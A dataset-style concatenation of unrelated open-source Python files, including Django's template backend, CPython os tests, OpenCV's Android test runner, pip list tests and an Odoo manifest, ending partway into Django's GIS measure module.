num=num, endpoint=endpoint)
for solution, t in zip(X, samples):
assert_allclose(solution, scipy.linalg.expm(t*A).dot(B))
nsuccesses += 1
if not nsuccesses:
msg = 'failed to find a status-' + str(target_status) + ' interval'
raise Exception(msg)
| bsd-3-clause |
liu602348184/django | django/template/backends/django.py | 240 | 5574 | # Since this package contains a "django" module, this is required on Python 2.
from __future__ import absolute_import
import sys
import warnings
from importlib import import_module
from pkgutil import walk_packages
from django.apps import apps
from django.conf import settings
from django.template import TemplateDoesNotExist
from django.template.context import Context, RequestContext, make_context
from django.template.engine import Engine, _dirs_undefined
from django.template.library import InvalidTemplateLibrary
from django.utils import six
from django.utils.deprecation import RemovedInDjango110Warning
from .base import BaseEngine
class DjangoTemplates(BaseEngine):
app_dirname = 'templates'
def __init__(self, params):
params = params.copy()
options = params.pop('OPTIONS').copy()
options.setdefault('debug', settings.DEBUG)
options.setdefault('file_charset', settings.FILE_CHARSET)
libraries = options.get('libraries', {})
options['libraries'] = self.get_templatetag_libraries(libraries)
super(DjangoTemplates, self).__init__(params)
self.engine = Engine(self.dirs, self.app_dirs, **options)
def from_string(self, template_code):
return Template(self.engine.from_string(template_code), self)
def get_template(self, template_name, dirs=_dirs_undefined):
try:
return Template(self.engine.get_template(template_name, dirs), self)
except TemplateDoesNotExist as exc:
reraise(exc, self)
def get_templatetag_libraries(self, custom_libraries):
"""
Return a collation of template tag libraries from installed
applications and the supplied custom_libraries argument.
"""
libraries = get_installed_libraries()
libraries.update(custom_libraries)
return libraries
class Template(object):
def __init__(self, template, backend):
self.template = template
self.backend = backend
@property
def origin(self):
return self.template.origin
def render(self, context=None, request=None):
# A deprecation path is required here to cover the following usage:
# >>> from django.template import Context
# >>> from django.template.loader import get_template
# >>> template = get_template('hello.html')
# >>> template.render(Context({'name': 'world'}))
# In Django 1.7 get_template() returned a django.template.Template.
# In Django 1.8 it returns a django.template.backends.django.Template.
# In Django 1.10 the isinstance checks should be removed. If passing a
# Context or a RequestContext works by accident, it won't be an issue
# per se, but it won't be officially supported either.
if isinstance(context, RequestContext):
if request is not None and request is not context.request:
raise ValueError(
"render() was called with a RequestContext and a request "
"argument which refer to different requests. Make sure "
"that the context argument is a dict or at least that "
"the two arguments refer to the same request.")
warnings.warn(
"render() must be called with a dict, not a RequestContext.",
RemovedInDjango110Warning, stacklevel=2)
elif isinstance(context, Context):
warnings.warn(
"render() must be called with a dict, not a Context.",
RemovedInDjango110Warning, stacklevel=2)
else:
context = make_context(context, request)
try:
return self.template.render(context)
except TemplateDoesNotExist as exc:
reraise(exc, self.backend)
def reraise(exc, backend):
"""
Reraise TemplateDoesNotExist while maintaining template debug information.
"""
new = exc.__class__(*exc.args, tried=exc.tried, backend=backend)
if hasattr(exc, 'template_debug'):
new.template_debug = exc.template_debug
six.reraise(exc.__class__, new, sys.exc_info()[2])
def get_installed_libraries():
"""
Return the built-in template tag libraries and those from installed
applications. Libraries are stored in a dictionary where keys are the
individual module names, not the full module paths. Example:
django.templatetags.i18n is stored as i18n.
"""
libraries = {}
candidates = ['django.templatetags']
candidates.extend(
'%s.templatetags' % app_config.name
for app_config in apps.get_app_configs())
for candidate in candidates:
try:
pkg = import_module(candidate)
except ImportError:
# No templatetags package defined. This is safe to ignore.
continue
if hasattr(pkg, '__path__'):
for name in get_package_libraries(pkg):
libraries[name[len(candidate) + 1:]] = name
return libraries
def get_package_libraries(pkg):
"""
Recursively yield template tag libraries defined in submodules of a
package.
"""
for entry in walk_packages(pkg.__path__, pkg.__name__ + '.'):
try:
module = import_module(entry[1])
except ImportError as e:
raise InvalidTemplateLibrary(
"Invalid template library specified. ImportError raised when "
"trying to load '%s': %s" % (entry[1], e)
)
if hasattr(module, 'register'):
yield entry[1]
| bsd-3-clause |
mancoast/CPythonPyc_test | cpython/232_test_os.py | 4 | 10718 | # As a test suite for the os module, this is woefully inadequate, but this
# does add tests for a few functions which have been determined to be more
# more portable than they had been thought to be.
import os
import unittest
import warnings
from test import test_support
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning, __name__)
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning, __name__)
class TemporaryFileTests(unittest.TestCase):
def setUp(self):
self.files = []
os.mkdir(test_support.TESTFN)
def tearDown(self):
for name in self.files:
os.unlink(name)
os.rmdir(test_support.TESTFN)
def check_tempfile(self, name):
# make sure it doesn't already exist:
self.failIf(os.path.exists(name),
"file already exists for temporary file")
# make sure we can create the file
open(name, "w")
self.files.append(name)
def test_tempnam(self):
if not hasattr(os, "tempnam"):
return
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning,
r"test_os$")
self.check_tempfile(os.tempnam())
name = os.tempnam(test_support.TESTFN)
self.check_tempfile(name)
name = os.tempnam(test_support.TESTFN, "pfx")
self.assert_(os.path.basename(name)[:3] == "pfx")
self.check_tempfile(name)
def test_tmpfile(self):
if not hasattr(os, "tmpfile"):
return
fp = os.tmpfile()
fp.write("foobar")
fp.seek(0,0)
s = fp.read()
fp.close()
self.assert_(s == "foobar")
def test_tmpnam(self):
import sys
if not hasattr(os, "tmpnam"):
return
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning,
r"test_os$")
name = os.tmpnam()
if sys.platform in ("win32",):
# The Windows tmpnam() seems useless. From the MS docs:
#
# The character string that tmpnam creates consists of
# the path prefix, defined by the entry P_tmpdir in the
# file STDIO.H, followed by a sequence consisting of the
# digit characters '0' through '9'; the numerical value
# of this string is in the range 1 - 65,535. Changing the
# definitions of L_tmpnam or P_tmpdir in STDIO.H does not
# change the operation of tmpnam.
#
# The really bizarre part is that, at least under MSVC6,
# P_tmpdir is "\\". That is, the path returned refers to
# the root of the current drive. That's a terrible place to
# put temp files, and, depending on privileges, the user
# may not even be able to open a file in the root directory.
self.failIf(os.path.exists(name),
"file already exists for temporary file")
else:
self.check_tempfile(name)
# Test attributes on return values from os.*stat* family.
class StatAttributeTests(unittest.TestCase):
def setUp(self):
os.mkdir(test_support.TESTFN)
self.fname = os.path.join(test_support.TESTFN, "f1")
f = open(self.fname, 'wb')
f.write("ABC")
f.close()
def tearDown(self):
os.unlink(self.fname)
os.rmdir(test_support.TESTFN)
def test_stat_attributes(self):
if not hasattr(os, "stat"):
return
import stat
result = os.stat(self.fname)
# Make sure direct access works
self.assertEquals(result[stat.ST_SIZE], 3)
self.assertEquals(result.st_size, 3)
import sys
# Make sure all the attributes are there
members = dir(result)
for name in dir(stat):
if name[:3] == 'ST_':
attr = name.lower()
self.assertEquals(getattr(result, attr),
result[getattr(stat, name)])
self.assert_(attr in members)
try:
result[200]
self.fail("No exception thrown")
except IndexError:
pass
# Make sure that assignment fails
try:
result.st_mode = 1
self.fail("No exception thrown")
except TypeError:
pass
try:
result.st_rdev = 1
self.fail("No exception thrown")
except (AttributeError, TypeError):
pass
try:
result.parrot = 1
self.fail("No exception thrown")
except AttributeError:
pass
# Use the stat_result constructor with a too-short tuple.
try:
result2 = os.stat_result((10,))
self.fail("No exception thrown")
except TypeError:
pass
# Use the constructr with a too-long tuple.
try:
result2 = os.stat_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
def test_statvfs_attributes(self):
if not hasattr(os, "statvfs"):
return
import statvfs
try:
result = os.statvfs(self.fname)
except OSError, e:
# On AtheOS, glibc always returns ENOSYS
import errno
if e.errno == errno.ENOSYS:
return
# Make sure direct access works
self.assertEquals(result.f_bfree, result[statvfs.F_BFREE])
# Make sure all the attributes are there
members = dir(result)
for name in dir(statvfs):
if name[:2] == 'F_':
attr = name.lower()
self.assertEquals(getattr(result, attr),
result[getattr(statvfs, name)])
self.assert_(attr in members)
# Make sure that assignment really fails
try:
result.f_bfree = 1
self.fail("No exception thrown")
except TypeError:
pass
try:
result.parrot = 1
self.fail("No exception thrown")
except AttributeError:
pass
# Use the constructor with a too-short tuple.
try:
result2 = os.statvfs_result((10,))
self.fail("No exception thrown")
except TypeError:
pass
# Use the constructr with a too-long tuple.
try:
result2 = os.statvfs_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
from test_userdict import TestMappingProtocol
class EnvironTests(TestMappingProtocol):
"""check that os.environ object conform to mapping protocol"""
_tested_class = None
def _reference(self):
return {"KEY1":"VALUE1", "KEY2":"VALUE2", "KEY3":"VALUE3"}
def _empty_mapping(self):
os.environ.clear()
return os.environ
def setUp(self):
self.__save = dict(os.environ)
os.environ.clear()
def tearDown(self):
os.environ.clear()
os.environ.update(self.__save)
class WalkTests(unittest.TestCase):
"""Tests for os.walk()."""
def test_traversal(self):
import os
from os.path import join
# Build:
# TESTFN/ a file kid and two directory kids
# tmp1
# SUB1/ a file kid and a directory kid
# tmp2
# SUB11/ no kids
# SUB2/ just a file kid
# tmp3
sub1_path = join(test_support.TESTFN, "SUB1")
sub11_path = join(sub1_path, "SUB11")
sub2_path = join(test_support.TESTFN, "SUB2")
tmp1_path = join(test_support.TESTFN, "tmp1")
tmp2_path = join(sub1_path, "tmp2")
tmp3_path = join(sub2_path, "tmp3")
# Create stuff.
os.makedirs(sub11_path)
os.makedirs(sub2_path)
for path in tmp1_path, tmp2_path, tmp3_path:
f = file(path, "w")
f.write("I'm " + path + " and proud of it. Blame test_os.\n")
f.close()
# Walk top-down.
all = list(os.walk(test_support.TESTFN))
self.assertEqual(len(all), 4)
# We can't know which order SUB1 and SUB2 will appear in.
# Not flipped: TESTFN, SUB1, SUB11, SUB2
# flipped: TESTFN, SUB2, SUB1, SUB11
flipped = all[0][1][0] != "SUB1"
all[0][1].sort()
self.assertEqual(all[0], (test_support.TESTFN, ["SUB1", "SUB2"], ["tmp1"]))
self.assertEqual(all[1 + flipped], (sub1_path, ["SUB11"], ["tmp2"]))
self.assertEqual(all[2 + flipped], (sub11_path, [], []))
self.assertEqual(all[3 - 2 * flipped], (sub2_path, [], ["tmp3"]))
# Prune the search.
all = []
for root, dirs, files in os.walk(test_support.TESTFN):
all.append((root, dirs, files))
# Don't descend into SUB1.
if 'SUB1' in dirs:
# Note that this also mutates the dirs we appended to all!
dirs.remove('SUB1')
self.assertEqual(len(all), 2)
self.assertEqual(all[0], (test_support.TESTFN, ["SUB2"], ["tmp1"]))
self.assertEqual(all[1], (sub2_path, [], ["tmp3"]))
# Walk bottom-up.
all = list(os.walk(test_support.TESTFN, topdown=False))
self.assertEqual(len(all), 4)
# We can't know which order SUB1 and SUB2 will appear in.
# Not flipped: SUB11, SUB1, SUB2, TESTFN
# flipped: SUB2, SUB11, SUB1, TESTFN
flipped = all[3][1][0] != "SUB1"
all[3][1].sort()
self.assertEqual(all[3], (test_support.TESTFN, ["SUB1", "SUB2"], ["tmp1"]))
self.assertEqual(all[flipped], (sub11_path, [], []))
self.assertEqual(all[flipped + 1], (sub1_path, ["SUB11"], ["tmp2"]))
self.assertEqual(all[2 - 2 * flipped], (sub2_path, [], ["tmp3"]))
# Tear everything down. This is a decent use for bottom-up on
# Windows, which doesn't have a recursive delete command. The
# (not so) subtlety is that rmdir will fail unless the dir's
# kids are removed first, so bottom up is essential.
for root, dirs, files in os.walk(test_support.TESTFN, topdown=False):
for name in files:
os.remove(join(root, name))
for name in dirs:
os.rmdir(join(root, name))
os.rmdir(test_support.TESTFN)
def test_main():
test_support.run_unittest(
TemporaryFileTests,
StatAttributeTests,
EnvironTests,
WalkTests
)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
shteeven/conference | main.py | 1 | 1566 | #!/usr/bin/env python
"""
main.py -- Udacity conference server-side Python App Engine
HTTP controller handlers for memcache & task queue access
"""
__author__ = 'stevenbarnhurst@gmail.com (Steven Barnhurst)'
import webapp2
from google.appengine.api import app_identity
from google.appengine.api import mail
from conference import ConferenceApi
class SetAnnouncementHandler(webapp2.RequestHandler):
def get(self):
"""Set Announcement in Memcache."""
ConferenceApi._cacheAnnouncement()
self.response.set_status(204)
class SendConfirmationEmailHandler(webapp2.RequestHandler):
def post(self):
"""Send email confirming Conference creation."""
mail.send_mail(
'noreply@%s.appspotmail.com' % (
app_identity.get_application_id()), # from
self.request.get('email'), # to
'You created a new Conference!', # subj
'Hi, you have created a following ' # body
'conference:\r\n\r\n%s' % self.request.get(
'conferenceInfo')
)
class SetFeaturedSpeakerHandler(webapp2.RequestHandler):
def post(self):
"""Set Announcement in Memcache."""
ConferenceApi._cacheFeaturedSpeaker(self.request)
self.response.set_status(204)
app = webapp2.WSGIApplication([
('/crons/set_announcement', SetAnnouncementHandler),
('/tasks/send_confirmation_email', SendConfirmationEmailHandler),
('/tasks/set_featured_speaker', SetFeaturedSpeakerHandler),
], debug=True)
| apache-2.0 |
BonexGu/Blik2D-SDK | Blik2D/addon/opencv-3.1.0_for_blik/modules/ts/misc/run_android.py | 7 | 8267 | #!/usr/bin/env python
import sys
from run_utils import *
from run_suite import TestSuite
def exe(program):
return program + ".exe" if hostos == 'nt' else program
class ApkInfo:
def __init__(self):
self.pkg_name = None
self.pkg_target = None
self.pkg_runner = None
def forcePackage(self, package):
if package:
if package.startswith("."):
self.pkg_target += package
else:
self.pkg_target = package
#==============================================================================
class Tool:
def __init__(self):
self.cmd = []
def run(self, args = [], silent = False):
cmd = self.cmd[:]
cmd.extend(args)
return execute(self.cmd + args, silent)
#==============================================================================
class Adb(Tool):
def __init__(self, sdk_dir):
Tool.__init__(self)
exe_path = os.path.join(sdk_dir, exe("platform-tools/adb"))
if not os.path.isfile(exe_path) or not os.access(exe_path, os.X_OK):
exe_path = None
# fix adb tool location
if not exe_path:
exe_path = getRunningProcessExePathByName("adb")
if not exe_path:
exe_path = "adb"
self.cmd = [exe_path]
self.cpuinfo = ""
def init(self, serial):
# remember current device serial. Needed if another device is connected while this script runs
if not serial:
serial = self.detectSerial()
if serial:
self.cmd.extend(["-s", serial])
# read device cpuinfo
self.cpuinfo = self.run(["shell", "cat /proc/cpuinfo"], silent = True)
if not self.cpuinfo:
raise Err("Can not get cpuinfo from Android device")
def detectSerial(self):
adb_res = self.run(["devices"], silent = True)
# assume here that device name may consists of any characters except newline
connected_devices = re.findall(r"^[^\n]+[ \t]+device\r?$", adb_res, re.MULTILINE)
if not connected_devices:
raise Err("Can not find Android device")
elif len(connected_devices) != 1:
raise Err("Too many (%s) devices are connected. Please specify single device using --serial option:\n\n%s", len(connected_devices), adb_res)
else:
return connected_devices[0].split("\t")[0]
def getOSIdentifier(self):
return "Android" + self.run(["shell", "getprop ro.build.version.release"], silent = True).strip()
def getHardware(self):
hw = re.search(r"^Hardware[ \t]*:[ \t]*(.*?)$", self.cpuinfo, re.MULTILINE)
if hw:
return hw.group(1).strip()
def checkArmHardware(self, expected_abi):
if expected_abi and "armeabi-v7a" in expected_abi:
if "ARMv7" not in self.cpuinfo:
raise Err("Android device does not support ARMv7 commands, but tests are built for armeabi-v7a")
if "NEON" in expected_abi and "neon" not in self.cpuinfo:
raise Err("Android device has no NEON, but tests are built for %s", expected_abi)
#==============================================================================
class Aapt(Tool):
def __init__(self, sdk_dir):
Tool.__init__(self)
aapt_fn = exe("aapt")
aapt = None
for r, ds, fs in os.walk( os.path.join(sdk_dir, 'build-tools') ):
if aapt_fn in fs:
aapt = os.path.join(r, aapt_fn)
break
if not aapt:
raise Err("Can not find aapt tool: %s", aapt_fn)
self.cmd = [aapt]
def dump(self, exe):
res = ApkInfo()
output = self.run(["dump", "xmltree", exe, "AndroidManifest.xml"], silent = True)
if not output:
raise Err("Can not dump manifest from %s", exe)
tags = re.split(r"[ ]+E: ", output)
# get package name
manifest_tag = [t for t in tags if t.startswith("manifest ")]
if not manifest_tag:
raise Err("Can not read package name from: %s", exe)
res.pkg_name = re.search(r"^[ ]+A: package=\"(?P<pkg>.*?)\" \(Raw: \"(?P=pkg)\"\)\r?$", manifest_tag[0], flags=re.MULTILINE).group("pkg")
# get test instrumentation info
instrumentation_tag = [t for t in tags if t.startswith("instrumentation ")]
if not instrumentation_tag:
raise Err("Can not find instrumentation detials in: %s", exe)
res.pkg_runner = re.search(r"^[ ]+A: android:name\(0x[0-9a-f]{8}\)=\"(?P<runner>.*?)\" \(Raw: \"(?P=runner)\"\)\r?$", instrumentation_tag[0], flags=re.MULTILINE).group("runner")
res.pkg_target = re.search(r"^[ ]+A: android:targetPackage\(0x[0-9a-f]{8}\)=\"(?P<pkg>.*?)\" \(Raw: \"(?P=pkg)\"\)\r?$", instrumentation_tag[0], flags=re.MULTILINE).group("pkg")
if not res.pkg_name or not res.pkg_runner or not res.pkg_target:
raise Err("Can not find instrumentation detials in: %s", exe)
return res
#===================================================================================================
class AndroidTestSuite(TestSuite):
def __init__(self, options, cache, android_env = {}):
TestSuite.__init__(self, options, cache)
sdk_dir = options.android_sdk or os.environ.get("ANDROID_SDK", False) or os.path.dirname(os.path.dirname(self.cache.android_executable))
log.debug("Detecting Android tools in directory: %s", sdk_dir)
self.adb = Adb(sdk_dir)
self.aapt = Aapt(sdk_dir)
self.env = android_env
def isTest(self, fullpath):
if os.path.isfile(fullpath):
if fullpath.endswith(".apk") or os.access(fullpath, os.X_OK):
return True
return False
def getOS(self):
return self.adb.getOSIdentifier()
def getHardware(self):
return [self.adb.getHardware()]
def checkPrerequisites(self):
self.adb.init(self.options.serial)
self.adb.checkArmHardware(self.cache.android_abi)
def runTest(self, path, logfile, workingDir, args = []):
args = args[:]
exe = os.path.abspath(path)
if exe.endswith(".apk"):
info = self.aapt.dump(exe)
if not info:
raise Err("Can not read info from test package: %s", exe)
info.forcePackage(self.options.package)
self.adb.run(["uninstall", info.pkg_name])
output = self.adb.run(["install", exe], silent = True)
if not (output and "Success" in output):
raise Err("Can not install package: %s", exe)
params = ["-e package %s" % info.pkg_target]
ret = self.adb.run(["shell", "am instrument -w %s %s/%s" % (" ".join(params), info.pkg_name, info.pkg_runner)])
return None, ret
else:
device_dir = getpass.getuser().replace(" ","") + "_" + self.options.mode +"/"
if isColorEnabled(args):
args.append("--gtest_color=yes")
tempdir = "/data/local/tmp/"
android_dir = tempdir + device_dir
exename = os.path.basename(exe)
android_exe = android_dir + exename
self.adb.run(["push", exe, android_exe])
self.adb.run(["shell", "chmod 777 " + android_exe])
env_pieces = ["export %s=%s" % (a,b) for a,b in self.env.items()]
pieces = ["cd %s" % android_dir, "./%s %s" % (exename, " ".join(args))]
log.warning("Run: %s" % " && ".join(pieces))
ret = self.adb.run(["shell", " && ".join(env_pieces + pieces)])
# try get log
hostlogpath = os.path.join(workingDir, logfile)
self.adb.run(["pull", android_dir + logfile, hostlogpath])
# cleanup
self.adb.run(["shell", "rm " + android_dir + logfile])
self.adb.run(["shell", "rm " + tempdir + "__opencv_temp.*"], silent = True)
if os.path.isfile(hostlogpath):
return hostlogpath, ret
return None, ret
#===================================================================================================
if __name__ == "__main__":
log.error("This is utility file, please execute run.py script")
| mit |
willingc/pip | tests/functional/test_list.py | 5 | 5581 | import os
import pytest
def test_list_command(script, data):
"""
Test default behavior of list command.
"""
script.pip(
'install', '-f', data.find_links, '--no-index', 'simple==1.0',
'simple2==3.0',
)
result = script.pip('list')
assert 'simple (1.0)' in result.stdout, str(result)
assert 'simple2 (3.0)' in result.stdout, str(result)
def test_local_flag(script, data):
"""
Test the behavior of --local flag in the list command
"""
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
result = script.pip('list', '--local')
assert 'simple (1.0)' in result.stdout
def test_user_flag(script, data, virtualenv):
"""
Test the behavior of --user flag in the list command
"""
virtualenv.system_site_packages = True
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
script.pip('install', '-f', data.find_links, '--no-index',
'--user', 'simple2==2.0')
result = script.pip('list', '--user')
assert 'simple (1.0)' not in result.stdout
assert 'simple2 (2.0)' in result.stdout
@pytest.mark.network
def test_uptodate_flag(script, data):
"""
Test the behavior of --uptodate flag in the list command
"""
script.pip(
'install', '-f', data.find_links, '--no-index', 'simple==1.0',
'simple2==3.0',
)
script.pip(
'install', '-e',
'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
)
result = script.pip(
'list', '-f', data.find_links, '--no-index', '--uptodate',
expect_stderr=True,
)
assert 'simple (1.0)' not in result.stdout # 3.0 is latest
assert 'pip-test-package (0.1.1,' in result.stdout # editables included
assert 'simple2 (3.0)' in result.stdout, str(result)
@pytest.mark.network
def test_outdated_flag(script, data):
"""
Test the behavior of --outdated flag in the list command
"""
script.pip(
'install', '-f', data.find_links, '--no-index', 'simple==1.0',
'simple2==3.0', 'simplewheel==1.0',
)
script.pip(
'install', '-e',
'git+https://github.com/pypa/pip-test-package.git'
'@0.1#egg=pip-test-package'
)
result = script.pip(
'list', '-f', data.find_links, '--no-index', '--outdated',
expect_stderr=True,
)
assert 'simple (1.0) - Latest: 3.0 [sdist]' in result.stdout
assert 'simplewheel (1.0) - Latest: 2.0 [wheel]' in result.stdout
assert 'pip-test-package (0.1, ' in result.stdout
assert ' Latest: 0.1.1 [sdist]' in result.stdout
assert 'simple2' not in result.stdout, str(result) # 3.0 is latest
@pytest.mark.network
def test_editables_flag(script, data):
"""
Test the behavior of --editables flag in the list command
"""
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
result = script.pip(
'install', '-e',
'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
)
result = script.pip('list', '--editable')
assert 'simple (1.0)' not in result.stdout, str(result)
assert os.path.join('src', 'pip-test-package') in result.stdout, (
str(result)
)
@pytest.mark.network
def test_uptodate_editables_flag(script, data):
"""
test the behavior of --editable --uptodate flag in the list command
"""
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
result = script.pip(
'install', '-e',
'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
)
result = script.pip(
'list', '-f', data.find_links, '--no-index',
'--editable', '--uptodate',
expect_stderr=True,
)
assert 'simple (1.0)' not in result.stdout, str(result)
assert os.path.join('src', 'pip-test-package') in result.stdout, (
str(result)
)
@pytest.mark.network
def test_outdated_editables_flag(script, data):
"""
test the behavior of --editable --outdated flag in the list command
"""
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
result = script.pip(
'install', '-e',
'git+https://github.com/pypa/pip-test-package.git'
'@0.1#egg=pip-test-package'
)
result = script.pip(
'list', '-f', data.find_links, '--no-index',
'--editable', '--outdated',
expect_stderr=True,
)
assert 'simple (1.0)' not in result.stdout, str(result)
assert os.path.join('src', 'pip-test-package') in result.stdout, (
str(result)
)
def test_outdated_pre(script, data):
script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
# Let's build a fake wheelhouse
script.scratch_path.join("wheelhouse").mkdir()
wheelhouse_path = script.scratch_path / 'wheelhouse'
wheelhouse_path.join('simple-1.1-py2.py3-none-any.whl').write('')
wheelhouse_path.join('simple-2.0.dev0-py2.py3-none-any.whl').write('')
result = script.pip('list', '--no-index', '--find-links', wheelhouse_path)
assert 'simple (1.0)' in result.stdout
result = script.pip('list', '--no-index', '--find-links', wheelhouse_path,
'--outdated')
assert 'simple (1.0) - Latest: 1.1 [wheel]' in result.stdout
result_pre = script.pip('list', '--no-index',
'--find-links', wheelhouse_path,
'--outdated', '--pre')
assert 'simple (1.0) - Latest: 2.0.dev0 [wheel]' in result_pre.stdout
| mit |
SAM-IT-SA/odoo | addons/fleet/__openerp__.py | 267 | 2245 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Fleet Management',
'version' : '0.1',
'author' : 'OpenERP S.A.',
'sequence': 110,
'category': 'Managing vehicles and contracts',
'website' : 'https://www.odoo.com/page/fleet',
'summary' : 'Vehicle, leasing, insurances, costs',
'description' : """
Vehicle, leasing, insurances, cost
==================================
With this module, Odoo helps you managing all your vehicles, the
contracts associated to those vehicle as well as services, fuel log
entries, costs and many other features necessary to the management
of your fleet of vehicle(s)
Main Features
-------------
* Add vehicles to your fleet
* Manage contracts for vehicles
* Reminder when a contract reach its expiration date
* Add services, fuel log entry, odometer values for all vehicles
* Show all costs associated to a vehicle or to a type of service
* Analysis graph for costs
""",
'depends' : [
'base',
'mail',
'board'
],
'data' : [
'security/fleet_security.xml',
'security/ir.model.access.csv',
'fleet_view.xml',
'fleet_cars.xml',
'fleet_data.xml',
'fleet_board_view.xml',
],
'demo': ['fleet_demo.xml'],
'installable' : True,
'application' : True,
}
| agpl-3.0 |
antb/TPT----My-old-mod | src/python/stdlib/test/test_bigaddrspace.py | 133 | 1303 | from test import test_support
from test.test_support import bigaddrspacetest, MAX_Py_ssize_t
import unittest
import operator
import sys
class StrTest(unittest.TestCase):
@bigaddrspacetest
def test_concat(self):
s1 = 'x' * MAX_Py_ssize_t
self.assertRaises(OverflowError, operator.add, s1, '?')
@bigaddrspacetest
def test_optimized_concat(self):
x = 'x' * MAX_Py_ssize_t
try:
x = x + '?' # this statement uses a fast path in ceval.c
except OverflowError:
pass
else:
self.fail("should have raised OverflowError")
try:
x += '?' # this statement uses a fast path in ceval.c
except OverflowError:
pass
else:
self.fail("should have raised OverflowError")
self.assertEqual(len(x), MAX_Py_ssize_t)
### the following test is pending a patch
# (http://mail.python.org/pipermail/python-dev/2006-July/067774.html)
#@bigaddrspacetest
#def test_repeat(self):
# self.assertRaises(OverflowError, operator.mul, 'x', MAX_Py_ssize_t + 1)
def test_main():
test_support.run_unittest(StrTest)
if __name__ == '__main__':
if len(sys.argv) > 1:
test_support.set_memlimit(sys.argv[1])
test_main()
| gpl-2.0 |
Paul-Ezell/cinder-1 | cinder/api/contrib/image_create.py | 44 | 1062 | # Copyright (c) 2012 NTT.
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Create Volume from Image extension."""
from cinder.api import extensions
class Image_create(extensions.ExtensionDescriptor):
"""Allow creating a volume from an image in the Create Volume v1 API."""
name = "CreateVolumeExtension"
alias = "os-image-create"
namespace = "http://docs.openstack.org/volume/ext/image-create/api/v1"
updated = "2012-08-13T00:00:00+00:00"
| apache-2.0 |
WillisXChen/django-oscar | oscar/lib/python2.7/site-packages/django/contrib/gis/measure.py | 118 | 12286 | # Copyright (c) 2007, Robert Coup <robert.coup@onetrackmind.co.nz>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Distance nor the names of its contributors may be used
# to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""
Distance and Area objects to allow for sensible and convenient calculation
and conversions.
Authors: Robert Coup, Justin Bronn, Riccardo Di Virgilio
Inspired by GeoPy (http://exogen.case.edu/projects/geopy/)
and Geoff Biggs' PhD work on dimensioned units for robotics.
"""
__all__ = ['A', 'Area', 'D', 'Distance']
from decimal import Decimal
from django.utils import six
from django.utils.functional import total_ordering
NUMERIC_TYPES = six.integer_types + (float, Decimal)
AREA_PREFIX = "sq_"
def pretty_name(obj):
return obj.__name__ if obj.__class__ == type else obj.__class__.__name__
@total_ordering
class MeasureBase(object):
STANDARD_UNIT = None
ALIAS = {}
UNITS = {}
LALIAS = {}
def __init__(self, default_unit=None, **kwargs):
value, self._default_unit = self.default_units(kwargs)
setattr(self, self.STANDARD_UNIT, value)
if default_unit and isinstance(default_unit, six.string_types):
self._default_unit = default_unit
def _get_standard(self):
return getattr(self, self.STANDARD_UNIT)
def _set_standard(self, value):
setattr(self, self.STANDARD_UNIT, value)
standard = property(_get_standard, _set_standard)
def __getattr__(self, name):
if name in self.UNITS:
return self.standard / self.UNITS[name]
else:
raise AttributeError('Unknown unit type: %s' % name)
def __repr__(self):
return '%s(%s=%s)' % (pretty_name(self), self._default_unit,
getattr(self, self._default_unit))
def __str__(self):
